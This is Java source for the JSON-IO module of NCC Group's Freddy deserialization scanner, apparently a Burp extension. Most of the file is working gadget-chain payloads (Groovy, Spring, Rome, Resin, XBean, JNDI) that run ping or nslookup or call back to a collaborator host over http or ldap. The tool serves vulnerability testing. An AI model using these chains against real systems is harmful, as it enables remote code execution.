// Freddy the Serial(isation) Killer
// 
// Released as open source by NCC Group Plc - https://www.nccgroup.trust/
//
// Project link: https://github.com/nccgroup/freddy/
//
// Released under agpl-3.0 see LICENSE for more information

package nb.freddy.modules.java;

import nb.freddy.modules.FreddyModuleBase;
import nb.freddy.modules.IndicatorTarget;
import nb.freddy.modules.SeverityRating;
import nb.freddy.modules.TargetPlatform;

import java.util.regex.Pattern;

/***********************************************************
 * Module targeting the Java JSON-IO library.
 *
 * Written by Nicky Bloor (@NickstaDB).
 **********************************************************/
public class JsonIoModule extends FreddyModuleBase {
    //Time-based payload delay
    private static final int TIME_DELAY = 18000;

    //Groovy payload data
    private static final String GROOVY_PREFIX = "{\"@type\":\"java.util.Arrays$ArrayList\",\"@items\":[{\"@id\":2,\"@type\":\"groovy.util.Expando\",\"expandoProperties\":{\"@type\":\"java.util.HashMap\",\"hashCode\":{\"@type\":\"org.codehaus.groovy.runtime.MethodClosure\",\"method\":\"start\",\"delegate\":{\"@id\":1,\"@type\":\"java.lang.ProcessBuilder\",\"command\":{\"@type\":\"java.util.ArrayList\",\"@items\":[";
    private static final String GROOVY_SUFFIX = "]},\"directory\":null,\"environment\":null,\"redirectErrorStream\":false,\"redirects\":null},\"owner\":{\"@ref\":1},\"thisObject\":null,\"resolveStrategy\":0,\"directive\":0,\"parameterTypes\":[],\"maximumNumberOfParameters\":0,\"bcw\":null}}},{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@ref\":2},{\"@ref\":2}],\"@items\":[{\"@ref\":2},{\"@ref\":2}]}]}";

    //LazySearchEnumeration payload data
    private static final String LSE_PREFIX = "{\"@type\":\"java.util.Arrays$ArrayList\",\"@items\":[{\"@id\":2,\"@type\":\"jdk.nashorn.internal.objects.NativeString\",\"value\":{\"@type\":\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\",\"dataHandler\":{\"dataSource\":{\"@type\":\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\",\"contentType\":null,\"is\":{\"@type\":\"javax.crypto.CipherInputStream\",\"cipher\":{\"@type\":\"javax.crypto.NullCipher\",\"provider\":null,\"spi\":null,\"transformation\":null,\"cryptoPerm\":null,\"exmech\":null,\"initialized\":false,\"opmode\":0,\"firstSpi\":null,\"firstService\":null,\"serviceIterator\":{\"@type\":\"sun.misc.Service$LazyIterator\",\"service\":null,\"loader\":null,\"configs\":{\"@type\":\"com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl\",\"candidates\":{\"@type\":\"com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl\",\"candidates\":null,\"nextMatch\":{\"attrs\":null,\"boundObj\":{\"@type\":\"javax.naming.spi.ContinuationDirContext\",\"cpe\":{\"@id\":1,\"remainingNewName\":null,\"environment\":null,\"altName\":null,\"altNameCtx\":null,\"resolvedName\":null,\"resolvedObj\":{\"@type\":\"javax.naming.Reference\",\"className\":\"Foo\",\"addrs\":[],\"classFactory\":\"Freddy\",\"classFactoryLocation\":\"";
    private static final String LSE_SUFFIX = "\"},\"remainingName\":null,\"rootException\":null,\"detailMessage\":null,\"cause\":{\"@ref\":1},\"stackTrace\":[],\"suppressedExceptions\":{\"@type\":\"java.util.Collections$UnmodifiableRandomAccessList\"}},\"env\":null,\"contCtx\":null},\"name\":\"foo\",\"className\":null,\"fullName\":null,\"isRel\":true},\"cons\":null,\"filter\":null,\"context\":null,\"env\":null,\"useFactory\":false},\"nextMatch\":null,\"cons\":{\"searchScope\":1,\"timeLimit\":0,\"derefLink\":false,\"returnObj\":false,\"countLimit\":0,\"attributesToReturn\":null},\"filter\":null,\"context\":null,\"env\":null,\"useFactory\":true},\"pending\":null,\"returned\":{\"@type\":\"java.util.TreeSet\"},\"nextName\":null},\"transforms\":null,\"lock\":{}},\"input\":{\"@type\":\"java.lang.ProcessBuilder$NullInputStream\"},\"ibuffer\":[],\"done\":false,\"obuffer\":null,\"ostart\":0,\"ofinish\":0,\"closed\":false,\"in\":null},\"consumed\":false},\"objDataSource\":null,\"object\":null,\"objectMimeType\":null,\"currentCommandMap\":null,\"transferFlavors\":[],\"dataContentHandler\":null,\"factoryDCH\":null,\"oldFactory\":null,\"shortType\":null},\"data\":null,\"dataLen\":0,\"mimeType\":null},\"map\":null,\"proto\":null,\"flags\":0,\"primitiveSpill\":null,\"objectSpill\":null,\"arrayData\":null},{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@ref\":2},{\"@ref\":2}],\"@items\":[{\"@ref\":2},{\"@ref\":2}]}]}";

    //Resin payload data
    private static final String RESIN_PREFIX = "{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@id\":2,\"@type\":\"com.caucho.naming.QName\",\"_context\":{\"@type\":\"javax.naming.spi.ContinuationDirContext\",\"cpe\":{\"remainingNewName\":null,\"environment\":null,\"altName\":null,\"altNameCtx\":null,\"resolvedName\":null,\"resolvedObj\":{\"@type\":\"javax.naming.Reference\",\"className\":\"Foo\",\"addrs\":[],\"classFactory\":\"Freddy\",\"classFactoryLocation\":\"";
    private static final String RESIN_SUFFIX = "\"},\"remainingName\":null,\"rootException\":null,\"detailMessage\":null,\"cause\":null,\"stackTrace\":null,\"suppressedExceptions\":null},\"env\":{},\"contCtx\":null},\"_items\":[\"foo\",\"bar\"]},{\"@id\":1,\"@type\":\"com.sun.org.apache.xpath.internal.objects.XString\",\"m_obj\":\"?\\u000F\\u001A\\u000B\",\"m_parent\":null}],\"@items\":[{\"@ref\":2},{\"@ref\":1}]}";

    //Rome payload data
    private static final String ROME_PREFIX = "{\"@type\":\"java.util.Arrays$ArrayList\",\"@items\":[{\"@id\":1,\"@type\":\"com.rometools.rome.feed.impl.EqualsBean\",\"beanClass\":\"com.rometools.rome.feed.impl.ToStringBean\",\"obj\":{\"@type\":\"com.rometools.rome.feed.impl.ToStringBean\",\"beanClass\":\"javax.xml.transform.Templates\",\"obj\":{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_tfactory\": {\"@type\" : \"com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl\"},\"_name\":\"Pwnr\",\"_bytecodes\":[[-54,-2,-70,-66,0,0,0,52,0,61,10,0,3,0,36,7,0,59,7,0,39,7,0,40,1,0,16,115,101,114,105,97,108,86,101,114,115,105,111,110,85,73,68,1,0,1,74,1,0,13,67,111,110,115,116,97,110,116,86,97,108,117,101,5,-83,32,-109,-13,-111,-35,-17,62,1,0,6,60,105,110,105,116,62,1,0,3,40,41,86,1,0,4,67,111,100,101,1,0,15,76,105,110,101,78,117,109,98,101,114,84,97,98,108,101,1,0,18,76,111,99,97,108,86,97,114,105,97,98,108,101,84,97,98,108,101,1,0,4,116,104,105,115,1,0,19,83,116,117,98,84,114,97,110,115,108,101,116,80,97,121,108,111,97,100,1,0,12,73,110,110,101,114,67,108,97,115,115,101,115,1,0,54,76,109,97,114,115,104,97,108,115,101,99,47,103,97,100,103,101,116,115,47,84,101,109,112,108,97,116,101,115,85,116,105,108,36,83,116,117,98,84,114,97,110,115,108,101,116,80,97,121,108,111,97,100,59,1,0,9,116,114,97,110,115,102,111,114,109,1,0,114,40,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,97,108,97,110,47,105,110,116,101,114,110,97,108,47,120,115,108,116,99,47,68,79,77,59,91,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,109,108,47,105,110,116,101,114,110,97,108,47,115,101,114,105,97,108,105,122,101,114,47,83,101,114,105,97,108,105,122,97,116,105,111,110,72,97,110,100,108,101,114,59,41,86,1,0,8,100,111,99,117,109,101,110,116,1,0,45,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,97,108,97,110,47,105,110,116,101,114,110,97,108,47,120,115,108,116,99,47,68,79,77,59,1,0,8,104,97,110,100,108,101,114,115,1,0,66,91,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,109,108,47,105,110,116,101,114,110,97,108,47,115,101,114,105,97,108,105,122,101,114,47,83,101,114,105,97,108,105,122,97,116,105,111,110,72,97,110,100,108,101,114,59,1,0,10,69,120,99,101,112,116,105,111,110,115,7,0,41,1,0,35,111,114,103,46,110,101,116,98,101,97,110,115,46,83,111,117,114,99,101,76,101,118,101,108,65,110,110,111,116,97,116,105,111,110,115,1,0,20,76,106,97,118,97,47,108,97,110,103,47,79,118,101,114,114,105,100,101,59,1,0,-90,40,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,97,108,97,110,47,105,110,116,101,114,110,97,108,47,120,115,108,116,99,47,68,79,77,59,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,109,108,47,105,110,116,101,114,110,97,108,47,100,116,109,47,68,84,77,65,120,105,115,73,116,101,114,97,116,111,114,59,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,109,108,47,105,110,116,101,114,110,97,108,47,115,101,114,105,97,108,105,122,101,114,47,83,101,114,105,97,108,105,122,97,116,105,111,110,72,97,110,100,108,101,114,59,41,86,1,0,8,105,116,101,114,97,116,111,114,1,0,53,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,109,108,47,105,110,116,101,114,110,97,108,47,100,116,109,47,68,84,77,65,120,105,115,73,116,101,114,97,116,111,114,59,1,0,7,104,97,110,100,108,101,114,1,0,65,76,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,109,108,47,105,110,116,101,114,110,97,108,47,115,101,114,105,97,108,105,122,101,114,47,83,101,114,105,97,108,105,122,97,116,105,111,110,72,97,110,100,108,101,114,59,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,18,84,101,109,112,108,97,116,101,115,85,116,105,108,46,106,97,118,97,12,0,10,0,11,7,0,42,1,0,52,109,97,114,115,104,97,108,115,101,99,47,103,97,100,103,101,116,115,47,84,101,109,112,108,97,116,101,115,85,116,105,108,36,83,116,117,98,84,114,97,110,115,108,101,116,80,97,121,108,111,97,100,1,0,64,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,97,108,97,110,47,105,110,116,101,114,110,97,108,47,120,115,108,116,99,47,114,117,110,116,105,109,101,47,65,98,115,116,114,97,99,116,84,114,97,110,115,108,101,116,1,0,20,106,97,118,97,47,105,111,47,83,101,114,105,97,108,105,122,97,98,108,101,1,0,57,99,111,109,47,115,117,110,47,111,114,103,47,97,112,97,99,104,101,47,120,97,108,97,110,47,105,110,116,101,114,110,97,108,47,120,115,108,116,99,47,84,114,97,110,115,108,101,116,69,120,99,101,112,116,105,111,110,1,0,32,109,97,114,115,104,97,108,115,101,99,47,103,97,100,103,101,116,115,47,84,101,109,112,108,97,116,101,115,85,116,105,108,1,0,8,60,99,108,105,110,105,116,62,1,0,17,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,7,0,44,1,0,10,103,101,116,82,117,110,116,105,109,101,1,0,21,40,41,76,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,59,12,0,46,0,47,10,0,45,0,48,1,0,16,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,7,0,50,1,0,-56,";
    private static final String ROME_SUFFIX = "8,0,52,1,0,4,101,120,101,99,1,0,40,40,91,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,12,0,54,0,55,10,0,45,0,56,1,0,13,83,116,97,99,107,77,97,112,84,97,98,108,101,1,0,29,121,115,111,115,101,114,105,97,108,47,80,119,110,101,114,49,53,52,51,52,56,48,57,56,55,56,53,57,50,1,0,31,76,121,115,111,115,101,114,105,97,108,47,80,119,110,101,114,49,53,52,51,52,56,48,57,56,55,56,53,57,50,59,0,33,0,2,0,3,0,1,0,4,0,1,0,26,0,5,0,6,0,1,0,7,0,0,0,2,0,8,0,4,0,1,0,10,0,11,0,1,0,12,0,0,0,47,0,1,0,1,0,0,0,5,42,-73,0,1,-79,0,0,0,2,0,13,0,0,0,6,0,1,0,0,0,40,0,14,0,0,0,12,0,1,0,0,0,5,0,15,0,60,0,0,0,1,0,19,0,20,0,3,0,12,0,0,0,63,0,0,0,3,0,0,0,1,-79,0,0,0,2,0,13,0,0,0,6,0,1,0,0,0,46,0,14,0,0,0,32,0,3,0,0,0,1,0,15,0,60,0,0,0,0,0,1,0,21,0,22,0,1,0,0,0,1,0,23,0,24,0,2,0,25,0,0,0,4,0,1,0,26,0,27,0,0,0,6,0,1,0,28,0,0,0,1,0,19,0,29,0,3,0,12,0,0,0,73,0,0,0,4,0,0,0,1,-79,0,0,0,2,0,13,0,0,0,6,0,1,0,0,0,50,0,14,0,0,0,42,0,4,0,0,0,1,0,15,0,60,0,0,0,0,0,1,0,21,0,22,0,1,0,0,0,1,0,30,0,31,0,2,0,0,0,1,0,32,0,33,0,3,0,25,0,0,0,4,0,1,0,26,0,27,0,0,0,6,0,1,0,28,0,0,0,8,0,43,0,11,0,1,0,12,0,0,0,43,0,6,0,2,0,0,0,22,-89,0,3,1,76,-72,0,49,4,-67,0,51,89,3,18,53,83,-74,0,57,87,-79,0,0,0,1,0,58,0,0,0,3,0,1,3,0,2,0,34,0,0,0,2,0,35,0,17,0,0,0,10,0,1,0,2,0,37,0,16,0,9],[-54,-2,-70,-66,0,0,0,52,0,27,10,0,3,0,21,7,0,23,7,0,24,7,0,25,1,0,16,115,101,114,105,97,108,86,101,114,115,105,111,110,85,73,68,1,0,1,74,1,0,13,67,111,110,115,116,97,110,116,86,97,108,117,101,5,113,-26,105,-18,60,109,71,24,1,0,6,60,105,110,105,116,62,1,0,3,40,41,86,1,0,4,67,111,100,101,1,0,15,76,105,110,101,78,117,109,98,101,114,84,97,98,108,101,1,0,18,76,111,99,97,108,86,97,114,105,97,98,108,101,84,97,98,108,101,1,0,4,116,104,105,115,1,0,3,70,111,111,1,0,12,73,110,110,101,114,67,108,97,115,115,101,115,1,0,38,76,109,97,114,115,104,97,108,115,101,99,47,103,97,100,103,101,116,115,47,84,101,109,112,108,97,116,101,115,85,116,105,108,36,70,111,111,59,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,18,84,101,109,112,108,97,116,101,115,85,116,105,108,46,106,97,118,97,12,0,10,0,11,7,0,26,1,0,36,109,97,114,115,104,97,108,115,101,99,47,103,97,100,103,101,116,115,47,84,101,109,112,108,97,116,101,115,85,116,105,108,36,70,111,111,1,0,16,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,1,0,20,106,97,118,97,47,105,111,47,83,101,114,105,97,108,105,122,97,98,108,101,1,0,32,109,97,114,115,104,97,108,115,101,99,47,103,97,100,103,101,116,115,47,84,101,109,112,108,97,116,101,115,85,116,105,108,0,33,0,2,0,3,0,1,0,4,0,1,0,26,0,5,0,6,0,1,0,7,0,0,0,2,0,8,0,1,0,1,0,10,0,11,0,1,0,12,0,0,0,47,0,1,0,1,0,0,0,5,42,-73,0,1,-79,0,0,0,2,0,13,0,0,0,6,0,1,0,0,0,54,0,14,0,0,0,12,0,1,0,0,0,5,0,15,0,18,0,0,0,2,0,19,0,0,0,2,0,20,0,17,0,0,0,10,0,1,0,2,0,22,0,16,0,9]],\"_class\":null,\"_transletIndex\":-1,\"_outputProperties\":null,\"_indentNumber\":0}}},{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@ref\":1},{\"@ref\":1}],\"@items\":[{\"@ref\":1},{\"@ref\":1}]}]}";

    //SpringAbstractBeanFactory payload data
    private static final String SABF_PREFIX = "{\"@type\":\"java.util.Arrays$ArrayList\",\"@items\":[{\"@id\":3,\"@type\":\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\",\"pointcut\":{\"@id\":2,\"@type\":\"org.springframework.aop.TruePointcut\"},\"adviceBeanName\":\"caller\",\"beanFactory\":{\"@type\":\"org.springframework.beans.factory.support.DefaultListableBeanFactory\",\"serializationId\":null,\"allowBeanDefinitionOverriding\":true,\"allowEagerClassLoading\":true,\"dependencyComparator\":null,\"autowireCandidateResolver\":{\"@type\":\"org.springframework.beans.factory.support.SimpleAutowireCandidateResolver\"},\"resolvableDependencies\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"beanDefinitionMap\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\",\"caller\":{\"@type\":\"org.springframework.beans.factory.support.RootBeanDefinition\",\"decoratedDefinition\":null,\"qualifiedElement\":null,\"allowCaching\":true,\"isFactoryMethodUnique\":false,\"targetType\":null,\"resolvedTargetType\":null,\"factoryMethodReturnType\":null,\"constructorArgumentLock\":{},\"resolvedConstructorOrFactoryMethod\":null,\"constructorArgumentsResolved\":false,\"resolvedConstructorArguments\":null,\"preparedConstructorArguments\":null,\"postProcessingLock\":{},\"postProcessed\":false,\"beforeInstantiationResolved\":null,\"externallyManagedConfigMembers\":null,\"externallyManagedInitMethods\":null,\"externallyManagedDestroyMethods\":null,\"beanClass\":null,\"scope\":\"\",\"abstractFlag\":false,\"lazyInit\":false,\"autowireMode\":0,\"dependencyCheck\":0,\"dependsOn\":null,\"autowireCandidate\":true,\"primary\":false,\"qualifiers\":{\"@type\":\"java.util.LinkedHashMap\"},\"nonPublicAccessAllowed\":true,\"lenientConstructorResolution\":true,\"factoryBeanName\":\"obj\",\"factoryMethodName\":\"start\",\"constructorArgumentValues\":{\"indexedArgumentValues\":{\"@type\":\"java.util.LinkedHashMap\"},\"genericArgumentValues\":{\"@type\":\"java.util.LinkedList\"}},\"propertyValues\":{\"propertyValueList\":{\"@type\":\"java.util.ArrayList\"},\"processedProperties\":null,\"converted\":false},\"methodOverrides\":{\"overrides\":{\"@type\":\"java.util.HashSet\"},\"modified\":false},\"initMethodName\":null,\"destroyMethodName\":null,\"enforceInitMethod\":true,\"enforceDestroyMethod\":true,\"synthetic\":false,\"role\":0,\"description\":null,\"resource\":null,\"source\":null,\"attributes\":{\"@type\":\"java.util.LinkedHashMap\"}}},\"allBeanNamesByType\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"singletonBeanNamesByType\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"beanDefinitionNames\":{\"@type\":\"java.util.ArrayList\",\"@items\":[\"caller\"]},\"manualSingletonNames\":{\"@type\":\"java.util.LinkedHashSet\"},\"frozenBeanDefinitionNames\":null,\"configurationFrozen\":false,\"instantiationStrategy\":{\"@type\":\"org.springframework.beans.factory.support.CglibSubclassingInstantiationStrategy\"},\"parameterNameDiscoverer\":{\"@type\":\"org.springframework.core.DefaultParameterNameDiscoverer\",\"parameterNameDiscoverers\":{\"@type\":\"java.util.LinkedList\",\"@items\":[{\"@type\":\"org.springframework.core.StandardReflectionParameterNameDiscoverer\"},{\"@type\":\"org.springframework.core.LocalVariableTableParameterNameDiscoverer\",\"parameterNamesCache\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"}}]}},\"allowCircularReferences\":true,\"allowRawInjectionDespiteWrapping\":false,\"ignoredDependencyTypes\":{\"@type\":\"java.util.HashSet\"},\"ignoredDependencyInterfaces\":{\"@type\":\"java.util.HashSet\",\"@items\":[{\"@type\":\"class\",\"value\":\"org.springframework.beans.factory.BeanClassLoaderAware\"},{\"@type\":\"class\",\"value\":\"org.springframework.beans.factory.BeanFactoryAware\"},{\"@type\":\"class\",\"value\":\"org.springframework.beans.factory.BeanNameAware\"}]},\"factoryBeanInstanceCache\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"filteredPropertyDescriptorsCache\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"parentBeanFactory\":null,\"beanClassLoader\":null,\"tempClassLoader\":null,\"cacheBeanMetadata\":true,\"beanExpressionResolver\":null,\"conversionService\":null,\"propertyEditorRegistrars\":{\"@type\":\"java.util.LinkedHashSet\"},\"customEditors\":{\"@type\":\"java.util.HashMap\"},\"typeConverter\":null,\"embeddedValueResolvers\":{\"@type\":\"java.util.LinkedList\"},\"beanPostProcessors\":{\"@type\":\"java.util.ArrayList\"},\"hasInstantiationAwareBeanPostProcessors\":false,\"hasDestructionAwareBeanPostProcessors\":false,\"scopes\":{\"@type\":\"java.util.LinkedHashMap\"},\"securityContextProvider\":null,\"mergedBeanDefinitions\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"alreadyCreated\":{\"@type\":\"java.util.HashSet\"},\"prototypesCurrentlyInCreation\":{\"threadLocalHashCode\":-1401181199},\"factoryBeanObjectCache\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"logger\":{\"@type\":\"org.apache.commons.logging.impl.NoOpLog\"},\"singletonObjects\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\",\"obj\":{\"@type\":\"java.lang.ProcessBuilder\",\"command\":{\"@type\":\"java.util.ArrayList\",\"@items\":[\"";
    private static final String SABF_SUFFIX = "\"]},\"directory\":null,\"environment\":null,\"redirectErrorStream\":false,\"redirects\":null}},\"singletonFactories\":{\"@type\":\"java.util.HashMap\"},\"earlySingletonObjects\":{\"@type\":\"java.util.HashMap\"},\"registeredSingletons\":{\"@type\":\"java.util.LinkedHashSet\"},\"singletonsCurrentlyInCreation\":{\"@type\":\"java.util.HashSet\"},\"inCreationCheckExclusions\":{\"@type\":\"java.util.HashSet\"},\"suppressedExceptions\":null,\"singletonsCurrentlyInDestruction\":false,\"disposableBeans\":{\"@type\":\"java.util.LinkedHashMap\"},\"containedBeanMap\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"dependentBeanMap\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"dependenciesForBeanMap\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"},\"aliasMap\":{\"@type\":\"java.util.concurrent.ConcurrentHashMap\"}},\"order\":null},{\"@id\":1,\"@type\":\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\",\"pointcut\":{\"@ref\":2},\"adviceBeanName\":null,\"beanFactory\":null,\"order\":null},{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@ref\":3},{\"@ref\":1}],\"@items\":[{\"@ref\":3},{\"@ref\":1}]}]}";

    //XBean payload data
    private static final String XBEAN_PREFIX = "{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@id\":3,\"@type\":\"org.springframework.aop.target.HotSwappableTargetSource\",\"target\":{\"@type\":\"org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding\",\"value\":{\"@id\":2,\"@type\":\"javax.naming.Reference\",\"className\":\"foo\",\"addrs\":[],\"classFactory\":\"Freddy\",\"classFactoryLocation\":\"";
    private static final String XBEAN_SUFFIX = "\"},\"context\":{\"@type\":\"org.apache.xbean.naming.context.WritableContext\",\"writeLock\":null,\"bindingsRef\":null,\"indexRef\":null,\"cacheReferences\":false,\"supportReferenceable\":false,\"checkDereferenceDifferent\":false,\"assumeDereferenceBound\":false,\"contextFederation\":null,\"masterContext\":null,\"nameInNamespace\":null,\"parsedNameInNamespace\":null,\"contextAccess\":null,\"modifiable\":false,\"inCall\":null},\"isRelative\":false,\"boundObj\":{\"@ref\":2},\"name\":\"foo\",\"className\":null,\"fullName\":null,\"isRel\":true}},{\"@id\":1,\"@type\":\"org.springframework.aop.target.HotSwappableTargetSource\",\"target\":{\"@type\":\"com.sun.org.apache.xpath.internal.objects.XString\",\"m_obj\":\"?\\u001A\\u0001\\f\",\"m_parent\":null}}],\"@items\":[{\"@ref\":3},{\"@ref\":1}]}";

    protected void initialiseModule() {
        setName("JSON-IO");
        setPlatform(TargetPlatform.JAVA);
        setModuleIsRCECapable(true);
        setDescriptionCaveats("");
        setRemediationDetail("");
        setSeverity(SeverityRating.MEDIUM);

        registerPassiveScanIndicator(Pattern.compile("((\")|(%22))((@)|(%40))type((\")|(%22))"), IndicatorTarget.REQUEST);
        registerPassiveScanIndicator("JsonReader.readObject", IndicatorTarget.RESPONSE);

        registerActiveScanExceptionPayload("{\"@type\":\"Freddy\"}", Pattern.compile("Class instance ((')|(&#39;))Freddy((')|(&#39;)) could not be created"));

        registerActiveScanTimeBasedPayload(GROOVY_PREFIX + "\"cmd\", \"/c\", \"ping -n 21 127.0.0.1\"" + GROOVY_SUFFIX, TIME_DELAY);
        registerActiveScanTimeBasedPayload(GROOVY_PREFIX + "\"ping\", \"-c\", \"21\", \"127.0.0.1\"" + GROOVY_SUFFIX, TIME_DELAY);

        registerActiveScanCollaboratorPayload(PN_GROOVY, false);
        registerActiveScanCollaboratorPayload(PN_LAZYSEARCH, false);
        registerActiveScanCollaboratorPayload(PN_RESIN, false);
        registerActiveScanCollaboratorPayload(PN_ROME, false);
        registerActiveScanCollaboratorPayload(PN_SPRINGABF, false);
        registerActiveScanCollaboratorPayload(PN_XBEAN, false);
    }

    protected String generateCollaboratorTextPayload(String payloadName, String hostname) {
        switch (payloadName) {
            case PN_GROOVY:
                return GROOVY_PREFIX + "\"nslookup\", \"" + hostname + "\"" + GROOVY_SUFFIX;

            case PN_LAZYSEARCH:
                return LSE_PREFIX + "http://" + hostname + "/" + LSE_SUFFIX;

            case PN_RESIN:
                return RESIN_PREFIX + "http://" + hostname + "/" + RESIN_SUFFIX;

            case PN_ROME:
                return ROME_PREFIX + encodeStringAsAsciiByteValues(padString("ldap://" + hostname + "/", 200)) + ROME_SUFFIX;

            case PN_SPRINGABF:
                return SABF_PREFIX + "ldap://" + hostname + "/" + SABF_SUFFIX;

            case PN_XBEAN:
                return XBEAN_PREFIX + "http://" + hostname + "/" + XBEAN_SUFFIX;
        }
        return null;
    }
}
